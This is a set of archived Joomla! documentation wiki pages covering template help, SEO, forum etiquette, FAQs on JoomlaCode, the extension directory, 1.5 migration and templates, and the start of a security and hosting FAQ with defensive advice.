* If you do not like tables in your Joomla! output, please see [http://help.joomla.org/ghop/feb2008/task059/Getting_Started_with_Template_Overrides_v2.tar.gz Getting Started with Template Overrides] [http://www.scribd.com/doc/2300107/Joomla-v-1-5-Getting-Started-with-Template-Overrides Scribd] by [[GHOP students/Wickrama Arachchi Vithanage Hashani Maduwanthi Weerarathna|Wickrama Arachchi Vithanage Hashani Maduwanthi Weerarathna (Hashani)]]

== Adding Javascript to your Template ==
* You might be interested in [http://help.joomla.org/ghop/feb2008/task060/task60.odt How to add JavaScript to a Joomla template] [http://www.scribd.com/doc/2300110/Joomla-v-15-Adding-Javascript-to-your-Template Scribd] by [[GHOP students/Anner J. Bonilla|Anner J. Bonilla (annerajb)]].

== Troubleshooting a Template Installation ==
If you are having trouble installing a template, see [http://help.joomla.org/ghop/feb2008/task061/Rev9.zip How to resolve problems with a template installation] [http://www.scribd.com/doc/2300161/Joomla-v-1-5-Template-Installation-Troubleshooting-Manual Scribd] by [[GHOP students/Chad Windnagle|Chad Windnagle (drmmr763)]].

=== Questions? ===

* [http://forum.joomla.org/viewforum.php?f=466 Joomla! v 1.5 Template Questions]

= Address Search Engine Optimization =
Search Engine Optimization is the practice of doing whatever is needed to help make your Web site rank higher in return results for a search engine. For some, this is very important aspect of attracting visitors to their site. Most experts agree, however, that the single best way to improve your chance of getting attention on the Internet is to provide good content on a regular basis. There are several things that you can do using core functionality to make your Joomla! Web site more SEO friendly. Here are some important areas to focus.

== Configure and troubleshoot SEF URLs ==
* [http://help.joomla.org/ghop/feb2008/task110/GHOPC_J110_SEFrevised-1.odt Joomla! v 1.5 SEF URLs] [http://www.scribd.com/doc/2300167/Joomla-v-15-Configure-and-troubleshoot-SEF-URLs Scribd] by [[GHOP students/Benjamin Hättasch|Benjamin Hättasch]].
* If you want to use IIS and Joomla!'s SEF URLs, [http://docs.joomla.org/IIS6_and_SEF_URLs_using_Joomla_1.5x do this first], then use the previous document.

== Remove WWW from your domain name ==
* [http://help.joomla.org/ghop/feb2008/task111/remove_www_from_domain6.odt How to remove "WWW" from your Domain Name and Why it matters] [http://www.scribd.com/doc/2300173/Joomla-How-to-Remove-www-from-domain-and-why-it-matters Scribd] by theoclymenus

== Create a Custom 404 Page ==
* [http://docs.joomla.org/Custom_error_pages Custom Error Pages, including 404's]

== SEO Questions ==
Questions on these topics should be asked in the [http://forum.joomla.org/viewforum.php?f=431 Joomla! v 1.5 Administration Forum].

=== SEO and SEF URL Questions? ===

* [http://forum.joomla.org/viewforum.php?f=428 General Joomla! v 1.5 Questions]

= Converting an Existing Website to Joomla! =

Check out the [[How to Convert an existing Web site to a Joomla! Web site]] guide for great step by step instructions.

= Asking Questions in the Forums =

At some point in this journey, you started feeling confident enough to reach out to others and began using the Forums. There are a few "common courtesies" you should be aware of:

* First of all, did you actually read the assignments? If not, do! Only you can help yourself learn and reading this material will do the trick!

* Please make certain you search, first, before posting a question. Nine times out of ten someone else had the same issue that you had. As it turns out, we all travel a similar path.

* Also, check the [[FAQs]]. There is already a TON of stuff out there that you WILL find helpful. Being responsible to search and review existing material keeps the questions at a manageable level for the volunteers who help.

* Be clear and specific in your request for help. Entries like “Help! It doesn’t work!” tend to get ignored. Try to explain everything that led up to your problem. Try to explain what your problem is. Be clear about what you want to happen. And, thank those who bother to help!

* Use the [http://forum.joomla.org/viewtopic.php?f=428&t=272481 Forum Post Assistant] to help you provide more information and better explain your problem.

* If your question/problem was solved, mark your thread as solved by editing the first post you made in that thread and changing the topic icon to the green check mark with a circle. You can also add [Solved] to your topic title. By doing this you allow other members who are doing searches to easily differentiate between solved and unsolved issues. This also saves the volunteers' time of having to open up solved topics.

= Thanks to our GHOP Contestants! =

Most of this material was written by Joomla! Google Highly Open Participation Contestants. This work is of the highest quality and the students were inspiring to work with. Sincere thanks to all of our participants for sharing their gifts with the Joomla! community. You guys rock!


[[Category:Landing Pages]]

Archived:JoomlaCode FAQs

2008-07-27T22:14:10Z

Igeoffi: add to faq category

{{review}}

===What is JoomlaCode?===

Joomlacode.org is the repository for the Joomla! source code as well as many open source Joomla! extensions. It requires separate registration from the the other joomla.org sites.

===Where can I find information to checkout Joomla! using SVN?===

See this link; http://joomlacode.org/gf/project/joomla/scmsvn/?action=AccessInfo

===I registered an account on JoomlaCode.org, but I never received an activation email. What do I do?===

Please ensure that the activation email is not in your spam folder. If you still can not find it, then email a JoomlaCode.org team member at http://forum.joomla.org/index.php/topic,149788.0.html and ask him/her to email the activation link to you directly.

===Why did my project get rejected?===

The "Project Rejected" email should contain specific information regarding the reason(s) why, and may suggest a remedy.

Most common reasons to date:
*The description is non-English; multi-lingual is more than acceptable.
*The description does not provide enough information about the project purpose and outcome.
*The project does not conform to the requirements of the JoomlaCode.org project rules.
*Your project was not related to Joomla!
*Your project was a "commercial" product.
*Your project is not a "code" project.

===If I have a problem or find a bug with JoomlaCode.org how can I report it?===

JoomlaCode.org has setup a Support project please post your issues there, then they can be managed and tracked by the team.
http://joomlacode.org/gf/project/support/tracker/

There is a feedback forum for Joomlacode:

http://forum.joomla.org/index.php/board,406.0.html.

===When I created my account, I typed in the wrong UNIX Name. Can you change it for me?===

Unfortunately, this is something that we can not do. The only option is to request that we delete your project, so that you can resubmit it for approval.

===Why I get a "Permission Denied" message when trying to view a project?===

The project was migrated and still needs to be activated by the admin. As soon as we get a request from the admin, we will assign the project to them. It is the admin's responsibility to make a project public.

===My project got rejected and I was asked to re-register it. Now I cannot re-submit it, I get a message saying that the project already exists. What do I do?===

Re-register your project using a different "Unix Project Name". (This is a known issue that is being worked on as we speak, apologies for the inconvenience )

<noinclude>[[Category:FAQ]]</noinclude>

Joomla! Extension Directory FAQs

2008-07-27T22:13:54Z

Igeoffi: add to faq category

{{review}}

===How do I list my extension in the extensions site?===
Information on how to list extensions in the extensions site is available here:
http://extensions.joomla.org/content/view/15/63/

===What extension is used to manage extensions.joomla.org?===
It is a customized version of Mosets Tree (a commercial component you can find in the Joomla! Extensions Directory ).

===Why was my extension rejected from being listed?===
Some of the common reasons extensions are rejected are because of:
*logo violations
*extension cannot be downloaded or found on the site
*extension does not install

===How can I help the extension submission process?===
There are several ways you can help the extension submission process go faster and smoother.
As you may know, the Joomla! Extension Directory is supported by volunteers and it takes time to go through all the extensions.
To make things easier:
*Make sure your download link leads directly to the download page. It makes downloading and testing the extension a whole lot easier.
*Make sure a front-end/public/guest user can actually download the extension.
*Test your extension to make sure the package can be installed.
*If you have use the Joomla! logo anywhere, make sure it follows the logo guidelines.
*If you need to make changes to your extension listing and it has not been published, do not submit another application. Removing duplicates takes up precious time. Instead, either email your changes to team@extensions.joomla.org with detailed information about your extension or wait until your extension is published.

===Why was my review of XYZ extension removed and/or edited?===
*Spam and/or self-promotion.
*Feature requests. Send feature requests to the developer.
*Support requests. Send support requests to the developer.
*You state that you haven't used the extension.
*Putting some type of code. The review section doesn't like code languages.

<noinclude>[[Category:FAQ]]</noinclude>

Joomla! Forum FAQs

2008-07-27T22:13:41Z

Igeoffi: add to faq category

Joomla! 1.5 Specific FAQs

2008-07-27T22:12:55Z

Igeoffi: add to faq category

{{review}}

===Do I have to upgrade to version 1.5?===

For the time being the Joomla! 1.0.x release will continue to be supported and updated if security or other major issues arise. Eventually, support for the 1.0.x will cease, but this will not be in the near future.

===How do I install Joomla! 1.5?===

Instructions for installation can be found here. http://help.joomla.org/content/section/48/302/

===How do I upgrade to Joomla! 1.5?===

You can migrate a Joomla! 1.0.x site or a Mambo 4.5.x to Joomla! 1.5.

Joomla 1.5 does not provide an upgrade path from earlier versions. Converting an older site to a Joomla 1.5 site requires creation of a new empty site using Joomla 1.5 and then populating the new site with the content from the old site. This migration of content is not a one-to-one process and involves conversions and modifications to the content dump.

There are two ways to perform the migration:

*An automated method of migration has been provided which uses a migrator component to create the migration dump out of the old site (Mambo 4.5.x up to Joomla 1.0.x) and a smart import facility in the Joomla 1.5 Installation that performs required conversions and modifications during the installation process.
* Migration can be performed manually. This involves exporting the required tables, manually performing required conversions and modifications and then importing the content to the new site after it is installed.

Automated migration

This is a two phased process using two tools. The first tool is a migrator component named 'com_migrator'. This component has been contributed by Harald Baer and is based on his 'eBackup' component. The migrator needs to be installed on the old site and when activated it prepares the required export dump of the old site's data. The second tool is built into the Joomla 1.5 installation process. The exported content dump is loaded to the new site and all conversions and modification are performed 'on-the-fly'.

Step 1 - Using com_migrator to export data from old site:
* Install the com_migrator component on the old site. It can be found at joomlacode.org .
* Select the component in the component menu of the administrator.
* Click on the 'Dump it' icon. Three exported gzipped export scripts will be created. The first is a complete backup of the old site. The second is the migration content of all core elements which will be imported to the new site. The third is a backup of all 3PD component tables.
* Click on the download icon of the particular exports files needed and store locally.
* Multiple export sets can be created.
* The exported data is not modified in anyway and the original encoding is preserved. This makes the com_migrator tool a recommended tool to use for manual migration as well.

Step 2 - Using the migration facility to import and convert data during Joomla 1.5 installation:

Note: This function requires use of the iconv function in PHP to convert encodings. If iconv is not found a warning will be provided.
* In step 6 - Configuration select the 'Load Migration Script' option in the 'Load Sample Data, Restore or Migrate Backed Up Content' section of the page.
* Enter the table prefix used in the content dump. For example: '#_' or '#__' are acceptable values.
* Select the encoding of the dumped content in the dropdown list. This should be the encoding used on the pages of the old site. (As defined in the _ISO variable in the language file or as seen in the browser page info/encoding/source)
* Browse the local host and select the migration export and click on 'Upload and Execute'
* A success message should appear or alternately a listing of db errors # Complete the other required fields in the Configuration step such as Site Name and Admin details and advance to the final step of installation. (Admin details will be ignored as the imported data will take priority. Please remember admin name and password from the old site)

===What happened to the locale setting?===

This is now defined in the language .xml file in the language metadata settings. If you are having locale problems (dates don't appear in your language) you might want to check/edit the entries in the locale tag. Note that multiple locale strings can be set and the host will usually accept the first one recognised.

===Where did the installer go?===

The improved installer can be found under the extensions option. With versions prior to 1.5 you needed to select a specific extensions type when you wanted to install it, with Joomla! 1.5 you just select the extension you want to upload, and click on install. The installer will do all the hard work for you.

===Only one edit window! How do I create "Read more..."?===

This is now implemented by inserting a tag (button is in the editor area) a dotted line appears in the edited text showing the split location for the "Read more...". A new bot takes care of the rest.

It is worth mentioning that this does not have a negative effect on migrated data from older sites. The new implementation is fully backward compatible.

===Where did the Mambots go?===

Mambots have been renamed as "Plugins" Mambots were introduced in Mambo and offered possibilities to add plugin logic to your site to mainly for the purpose of manipulating content. In Joomla!, Plugins will now have much broader capabilities than Mambots. Plugins are able to extend functionality at the framework layer as well.

===Where is the static content?===

In Joomla! versions prior to 1.5 there was a distinctive difference on static and normal content. Both content types are still around, but are not handled as separate items. If you want to create static content, just select "uncategorized" as section and category and the content is handled as static content.

===Will my 1.0 extensions still work?===

There is a legacy system in place that will allow extensions that are not 1.5 compatible to continue to operate. However, we strongly recommend that you update to the current version of all extensions prior to migration and that you check each extension's home page for specific recommendations about migration for that extension.

To activate the legacy support, go to the plugin manager and enable the legacy plugin.

===How do I create a custom module?===

To make a custom module, go to the module manager and then click on "new." This will give you a detailed list of existing modules. Look for "Custom html." Select this, and then click on next.

===How do I set global preferences for content?===

Global preferences in content are set in the article manager.

In the backend, go to Content>Article manager.

On the tool bar, second from the right, there is the preferences icon.

Click that and set your global preferences.

===Why won't my legacy extension install?===

Although Joomla! 1.5 allows backward compatability with 1.0 extensions, there are some times when a 1.0 extension does not install or work as intended.

Below are some suggestions to make them work.
* Make sure you have enabled the legacy mode in your plugin manager.
* Joomla! 1.5 requires strict XML whereas Joomla! 1.0.x did not. Look at the XML file (there is one in every extension) and see if there are any problems. The most common problem seems to be the character & which needs to be replaced with & a m p; (remove the spaces!). Any other special characters also need to be replaced in this way. There are numerous sources on the web that can show you how to translate special characters.
* Read your error messages. :) Although some are complicated, many involve simple things. For example in many places things that used to be named beginning with the string "mos" now have new names (usually the same, but with the mos deleted). If your error messages say mosSomething not found go edit the file and take off the mos.
* Related to that, if your error message says file not found, see if the file has been moved to a new directory.
* If these do not work try going to the homepage for the extension (these can be found in the listings in JED). Many people are trying to do the same thing you are, so you will probably get some useful advice.

If you do get an extension work by making any of these or other changes, the nice thing to do is to send a message to the extension's developer so that the patches can be available to others.

[[Category:FAQ]]

J1.5:Template FAQs

2008-07-27T22:12:26Z

Igeoffi: add to faq category

{{review}}

===What is a template?===

The [[Template]] controls the overall look and layout of your site. It provides the framework that brings together common elements, [[Modules|modules]] and [[Components|components]] as well as providing the [[CSS|cascading style sheet]] for your site. Both the [[Front-end]] (Site) and the [[Back-end]] (Administrator) of your site have templates.

When Joomla! is installed several templates are automatically included. You can find many more templates at other websites. Some are available without charge under various licenses, and some are for sale. In addition, there are many designers available who can make custom templates. You can also [[Joomla! 1.5 Template Tutorials Project|make your own template]].

Templates are managed with the [[Template Manager]], which is located on the site menu on the Back-end of your site.

The following may be helpful in understanding templates:
* http://help.joomla.org/content/view/474/153/

===How do I install a new template?===
'''1.0'''

In the [[Back-end]] of the site, go to [[Installer]]s>>Templates-Site (or Templates-Administrator if you are installing an administrator template).

Browse for the template zip file and click ''Upload File'' and ''Install''.

Alternatively, you can install from a directory.

To make the new template the default template for your site, go to the [[Template Manager]] (Site>>Template Manager>>Site Templates).
You should see the name of your new template on the list of templates.

Select it and click on the default icon if you want it to be the default icon for your site.

'''1.5'''

In the [[Back-end]] of the site, go to [[Extension]]s>>Install/Uninstall.

Browse for the template zip file and click Upload File and Install.

Alternatively, you can install from a directory.

To make the new template the default template for your site, select it and click the default icon (star).

===How do I modify a template?===
Templates are just a series of xml, php, html and image files that are stored in the templates directory of your site.
You can edit these files or you can use the editing interface available in the [[Template Manager]].

'''1.0'''

In the [[Back-end]], select Site>>Template Manager>>Site Templates.

Select the template you wish to modify.

'''1.5'''

In the [[Back-end]], select Site>>[[Extension]]s>>Templates.
Select the template you wish to modify.
Click the edit icon.

'''both'''
You are given the choice of editing "html" and "css."

[[CSS]] stands for cascading style sheets. This controls many elements of the look and feel of your site.
[[HTML]] is the file that controls where positions are defined and positioned. Other than that, it should be noted that, with a few exceptions, what is in the .css and what is in the HTML files largely depends on the approach of the tempate designer.

One common change is to use your own graphic/image. Graphics are linked to in the HTML file. Simply change the reference to the image of your choice. Keep in mind that it if it is a different size than the original image this may change the appearance of the site in unexpected ways.

===How do I assign a template to a specific page?===

In Joomla! there is a default template, but you can assign other templates to specific "pages" that are defined by menu links.

To assign a template to a page, you must first make sure that there is a direct menu link to the page.

'''1.0'''
* Go to Site>>[[Template Manager]]>>Site Templates
* Select the template you wish to assign.
* Click on the assign icon.
* On the right, there will be a list with all of the possible pages the template can be assigned to. Select one or more pages and save.

'''1.5'''

* Go to [[Extension]]s>>[[Template Manager]]
* Select the Template and click the edit icon (or click the template name)
* In the left column, change "None" to "Select from List."
* Select the links you want to apply the template to.
* Save

Note that you cannot assign the default template to individual pages.

'''Understanding'''

The templating system uses the [[ItemID]] to determine which template to show. ItemIDs are created when you create a menu link. This is why only menu items are shown in the list of pages to which you can assign templates.

===What are the base Joomla! CSS styles?===

'''1.0'''

Provided by Haaris

/**com_contact**/
.componentheading
.contentpane
.contentdescription
.sectiontableheader
.category
.small
.contentpane
.contentheading
.contact_email
.inputbox
.button

/**com_content**/
.componentheading
.contentpane
.contentdescription
.inputbox
.sectiontableheader
.sectiontableentry1
.sectiontableentry2
.sectiontablefooter
.blogsection
.contentpaneopen
.article_seperator
.contentheading
.contentpagetitle
.buttonheading
.small
.createdate
.modifydate
.readon
.pagenav_prev
.pagenav_next
.adminform
.button
.text_area
.blog
.blog_more

/**com_login**/
.contentpane
.componentheading
.inputbox
.button

/**com_newsfeeds**/
.componentheading
.contentpane
.contentdescription
.sectiontableheader
.category
.small
.contentheading

/**com_poll**/
.componentheading
.contentpane
.pollstableborder
.sectiontableheader
.smalldark
.button
.inputbox

/**com_registration**/
.componentheading
.contentpane
.inputbox
.button

/**com_search**/
.componentheading
.contentpaneopen
.inputbox
.button
.searchintro
.small
.highlight

/**com_user**/
.componentheading
.inputbox
.button
.row1
.row2

/**com_weblinks**/
.componentheading
.contentpane
.contentdescription
.sectiontableheader
.tabclass1
.tabclass2
.small
.category
.inputbox

/**com_wrapper**/
.contentpane
.componentheading
.wrapper

/**includes/frontend**/
.moduletable
.newsfeed
.module
.message

/**includes\HTML_toolbar .php**/
.toolbar

/**includes\joomla .php**/
.profiler
.item
.small
.back_button
.buttonheading
.tab-page
.tab
.inputbox

/**includes\joomla .xml .php**/
.paramlist
.editlinktip
.text_area
.inputbox

/**includes\pageNavigation .php**/
.inputbox
.pagenav

/**includes\pathway .php**/
.pathway

/**includes\js\dtree\dtree .js**/
.dtree
.dTreeNode
.node
.clip

/**includes\patTemplate\tmpl\forms .html**/
.message
.tooltip
.tab-page
.tab
.expander

/**mambots\content\mosimage .php**/
.mosimage_caption
.mosimage

/**mambots\content\mospaging .php**/
.pagenavcounter
.pagenavbar
.contenttoc
.toclink

/**mambots\content\mosvote .php**/
.content_rating
.content_vote
.button

/**modules\mod_latestnews .php**/
.latestnews

/**modules\mod_login .php**/
.button
.inputbox

/**modules\mod_mostread .php**/
.mostread

/**modules\mod_mostread .php**/
.poll
.pollstableborder
.button

/**modules\mod_mostread .php**/
.syndicate
.syndicate_text

/**modules\mod_search .php**/
.inputbox
.button
.search

Provided by Compass:

#active_menu
#blockrandom
#contact_email_copy
#contact_text
#emailForm
#mod_login_password
#mod_login_remember
#mod_login_username
#poll
#search_ordering
#search_searchword
#searchphraseall
#searchphraseany
#searchphraseexact
#voteid1, #voteid2
.adminform
.article_seperator
.back_button
.blog
.blog_more
.blogsection
.button
.buttonheading
.category
.clr
.componentheading
.contact_email
.content_rating
.content_vote
.contentdescription
.contentheading
.contentpagetitle
.contentpane
.contentpaneopen
.contenttoc
.createdate
.fase4rdf
.footer
.frontpageheader
.inputbox
.latestnews
.mainlevel
.message
.modifydate
.module
.moduletable
.mostread
.newsfeed
.newsfeeddate
.newsfeedheading
.pagenav
.pagenav_next
.pagenav_prev
.pagenavbar
.pagenavcounter
.pathway
.polls
.pollsborder
.pollstableborder
.readon
.readon:hover
.search
.searchintro
.sectionentry1
.sectionentry2
.sectionheader
.sitetitle
.small
.smalldark
.sublevel
.syndicate
.syndicate_text
.text_area
.toclink
.weblinks
.wrapper

===What are module switches? (or -1 -2 and -3) ===
This is how you apply the switches:

; <nowiki>switch: -1</nowiki>
: Strips all surrounding code from the module.

<source lang="php">
<?php mosLoadModules ( 'user1', -1 ); ?>
</source>

The outputted html code looks like this:
<source lang="html4strict">
<div class="user1_inner">
<ul class="latestnews">
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=3&Itemid=9"
class="latestnews">Newsflash 2
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=4&Itemid=9"
class="latestnews">Newsflash 3
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=2&Itemid=9"
class="latestnews">Newsflash 1
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=9&Itemid=2"
class="latestnews">
Example News Item 4
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=7&Itemid=2"
class="latestnews">
Example News Item 2
</a>
</li>
</ul>
</div>
</source>

; <nowiki>switch: -2</nowiki>
: Puts the module's title in a h3, and wraps the entire thing in a

<source lang="php">
<?php mosLoadModules ( 'user1', -2 ); ?>
</source>
The outputted html code looks like this:
<source lang="html4strict">
<div class="moduletable">
<h3>Latest News</h3>
<ul class="latestnews">
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=4&Itemid=9"
class="latestnews">Newsflash 3
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=2&Itemid=9"
class="latestnews">Newsflash 1
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=3&Itemid=9"
class="latestnews">Newsflash 2
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=6&Itemid=2"
class="latestnews">Example News Item 1
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=9&Itemid=2"
class="latestnews">Example News Item 4
</a>
</li>
</ul>
</div>
</source>

;<nowiki>switch: -3</nowiki>
:Puts the module's title in a h3, and ads several layers of divs that can be used to apply [[CSS]] techniques with [[Rounded corners|rounded corners]]

<source lang="php">
<?php mosLoadModules ( 'user1', -3 ); ?>
</source>
The outputted code looks like this:
<source lang="html4strict">
<div class="module">
<div>
<div>
<div>
<h3>Latest News</h3>
<ul class="latestnews">
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=4&Itemid=9"
class="latestnews">Newsflash 3
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=2&Itemid=9"
class="latestnews">Newsflash 1
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=3&Itemid=9"
class="latestnews">
Newsflash 2 </a> </li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=6&Itemid=2"
class="latestnews">
Example News Item 1
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=9&Itemid=2"
class="latestnews">
Example News Item 4
</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</source>

If there is no switch at all:
<source lang="php">
<?php mosLoadModules ( 'user1'); ?>
</source>

The outputted code looks like this:
<source lang="html4strict">
<table class="moduletable" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<th valign="top">
Latest News
</th>
</tr>
<tr>
<td>
<ul class="latestnews">
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=4&Itemid=9"
class="latestnews">Newsflash 3
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=2&Itemid=9"
class="latestnews">
Newsflash 1
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=3&Itemid=9"
class="latestnews">Newsflash 2
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=6&Itemid=2"
class="latestnews">
Example News Item 1
</a>
</li>
<li class="latestnews">
<a href="http://localhost/projects/1112rc2/index.php?option=com_content&task=view&id=9&Itemid=2"
class="latestnews">
Example News Item 4
</a>
</li>
</ul>
</td>
</tr>
</tbody>
</table>
</div>
</source>

In Joomla! 1.5 each switch has a style associated with it.

switch -3: $style = 'rounded';
switch -2: $style = 'xhtml
switch -1: $stylle = 'raw';
switch 0 :$style = 'table';

===How do I add a position to a template?===
To create a "new" position chose one of the names from the list of positions shown in
Site>[[Template Manager]]>Module Positions

'''1.0'''

In your template add
<source lang="php">
<?php mosLoadModules ('position_name'); ?>
</source>

You will want to surround it with approprate html so that it appears where you want it to and with the formatting you want.

'''1.5'''

===How do I change the image(s) in my template?===
One common [[Template|template]] change is to use your own graphic/image. Simple graphics (not [[Banner|banners]]) are linked in the [[HTML]] file. Simply change the reference to the image of your choice in the HTML file of your template. Do this by, in the [[Back-end|adminsitrative interface]], going to Site>>[[Template Manager]] and then selecting your template. Click the icon for html.

Keep in mind that if it is a different size than the original image this may change the appearance of the site in unexpected ways.

The images for a given template are generally located in this folder:
/templates/''templatename''/images
(where you substitute the name of the template you are using.)

===How do I collapse an empty position in a template?===
Very often the question is asked on how to collapse a position in any template. Note collapse here means "not show" if no modules are published to these columns.

'''1.0'''

Here is a method on how to do this as an example with the tremendous popular [[rhuk_solarflare]] template:

open <tt>../templates/rhuk_solarflare_ii/index.php</tt> and find and replace this:
<source lang="php">
<div id="left_outer">
<div id="left_inner">
<?php mosLoadModules ( 'left', -2 ); ?>
</div>
</div>
<div id="content_outer">
</source>
with this :
<source lang="php">
<?php
if ( !(mosCountModules( 'left' )) ) {
?>
<div id="content_outer2">
<?
}
else {
?>
<div id="left_outer">
<div id="left_inner">
<?php mosLoadModules ( 'left', -2 ); ?>
</div>
</div>
<div id="content_outer">
<?
}
?>
</source>
and save the file.

Then open <tt>../templates/rhuk_solarflare_ii/css/template_css.css</tt> file and add:
<source lang="css">
#content_outer2 {
padding: 0px;
margin-top: 0px;
margin-left: 0px;
/** border: 1px solid #cccccc; **/
float: left;
width: 800px;
}
</source>

Save and your left column now will collapse when you don't publish anything to it!

This method you can multiply to any template if you try to follow the logic of the code!

'''1.5'''

===CSS Text/Font Resizing (A+ A-) on Joomla Template===

'''1.0'''

I recognize that there are some of you who are sort of scratching your heads wondering how to get from where your site is now to where joomla.org's is. So for those of you wanting it laid out all the way, here's a more detailed instruction set that summarizes and extends what has already been said through the course of this thread:

*Step 1 - download joomla.org's font style switcher file ([http://demo.joomla.org/1.5/templates/beez/javascript/md_stylechanger.js md_stylechanger.js])
*Step 2 - put that file somewhere in the folder of the template you are using
*Step 3 - put A+, A-, and Reset images in your template's image folder
*Step 4 - paste the following code snippet somewhere in your template's index.php file


<source lang="php">
<?php
// shortcut of template URL used in src attributes
$template_url = $mosConfig_live_site .'/templates/'. $mainframe->getTemplate();
?>
<script type="text/javascript" language="javascript"
src="<?php echo $template_url; ?>/____1____"></script>
<a href="index.php" title="Increase size" onclick="changeFontSize(1);return false;">
<img src="<?php echo $template_url; ?>/images/____2____" alt="" border="0" />
</a>
<a href="index.php" title="Decrease size" onclick="changeFontSize(-1);return false;">
<img src="<?php echo $template_url; ?>/images/____3____" alt="" border="0" />
</a>
<a href="index.php" title="Revert styles to default" onclick="revertStyles(); return false;">
<img src="<?php echo $template_url; ?>/images/____4____" alt="" border="0" />
</a>
</source>

* Step 5: Do all of the following:
*# Replace ____1____ with the location in your template folder where you saved the .js file
*# Replace ____2____ with the name of your A+ image
*# Replace ____3____ with the name of your A- image
*# Replace ____4____ with the name of your Reset image

*Step 6: Do one of the following:
** Bask in the awesomeness that is session font resizing
** Start figuring out why the buttons do nothing (either because your site doesn't use style classes, or because I messed up somewhere)

===Can I remove the "Powered by Joomla!" message?===

Yes. You may remove that message, which is in <tt>footer.php</tt>. You may however '''not''' remove copyright and license information from the source code.

===How do I make it so my modules are laid out horizontally?===

See [[Administration_FAQs#How_do_I_control_whether_modules_are_vertically_or_horizontally_arranged.3F | How do I control whether modules are vertically or horizontally arranged?]]

[[Category:FAQ]]

Security and Performance FAQs

2008-07-27T22:11:57Z

Igeoffi: add to faq category

{{RightTOC}}

= Getting Started =

==Is GNU and Open Source software worth the costs and risks?==

It's difficult, if not impossible, to argue against the value proposition of GNU and Open Source software, although [http://www.catb.org/~esr/halloween/ some have tried]. Due to zero licensing fees, lower administrative overhead, high-quality code, security releases that are distributed in minutes or hours rather than months or marketing cycles, and free online support from thousands of like-minded developers and users, GNU and Open Source offerings are often the best solution. The math is really quite compelling:

{| border="1"
|+
| '''Applications'''
| '''Industry Leader'''
| align="right" | '''Cost'''
|-
| GNU/Linux
| Yes
| align="right" | 0
|-
| Apache Web Server
| Yes
| align="right" | 0
|-
| MySQL Relational Database
| Yes
| align="right" | 0
|-
| PHP Scripting Language
| Yes
| align="right" | 0
|-
| Joomla! Content Management System
| Yes
| align="right" | 0
|-
| Thousands of Joomla Extensions
| Varies
| align="right" | 0
|+
| '''Support'''
| '''Relative Quality'''
| align="right" | '''Cost'''
|-
| Joomla! Project Leadership Team
| High
| align="right" | 0
|-
| Joomla! Forge
| High
| align="right" | 0
|-
| Joomla! Online Forums
| High
| align="right" | 0
|-
| Joomla! Documentation
| Medium
| align="right" | 0
|-
| Thousands of Online Volunteers
| High
| align="right" | 0
|-
| Paid Professional Support
| Widely Available
| align="right" | 0
|+
| align="right" | '''Total'''
|  
| align="right" | '''0'''
|}

==What is the Joomla! Administrator's Security Checklist?==
The [[Joomla! Administrator's Security Checklist]] is a concise selection of the best tips and tricks from the many contributors in the Joomla Security Forums. Review this list BEFORE you install Joomla for the first time.

==What are the top 10 stupidest Joomla! security tricks?==
A very good question, and sadly one that many did not ask in time. We proudly present the [[Top 10 Stupidest Administrator Tricks]].

==How do I choose a quality hosting provider?==

The following is a short list of security-related requirements. Depending on your specific needs, you may have many other security requirements such as shell access, cron access, SSL server, etc.

* '''Choose *NIX:''' Joomla! requires at least PHP and MySQL to run. Because Apache/PHP/MySQL run best on UNIX or GNU/LINUX servers, choose a host that offers these options.
* '''Use Secure FTP:''' Choose a host that requires SFTP (Secure FTP) for transferring files. This prevents others from snooping your user name and password from packets as they travel over the Internet.

* '''Set PHP register_globals OFF:''' The most security conscious hosts turn PHP's Register Globals directive OFF by default. The next best allow you to turn it off in local .htaccess or php.ini files. A host that requires you to run a site with Register Globals ON should be avoided. This is true for any PHP enabled site, whether or not you are running Joomla!. There is a legitimate argument to be made by hosts for keeping Register Globals ON for PHP4 sites. This is that it would break too much legacy code. This argument should not be accepted for a PHP5 installation. Beginning with PHP5, the official PHP recommendation was to keep Register Globals is OFF. Note that beginning with PHP6, there will not even be a Register Globals setting, so don't get caught in a Register Globals backwater. Modify your code to work without Register Globals, and choose a host that encourages such practices.

* '''Seek PHP flexibility:''' Choose a host that allows you to use either PHP4 or PHP5.

* '''Stay up-to-date:''' Choose a host that stays up-to-date with the latest stable versions of core applications, including the operating system, database, and scripting languages.

* '''Avoid cheap shared servers:''' Be sure users on your shared server can't view each other's files and databases, for example through shell accounts and cpanels.

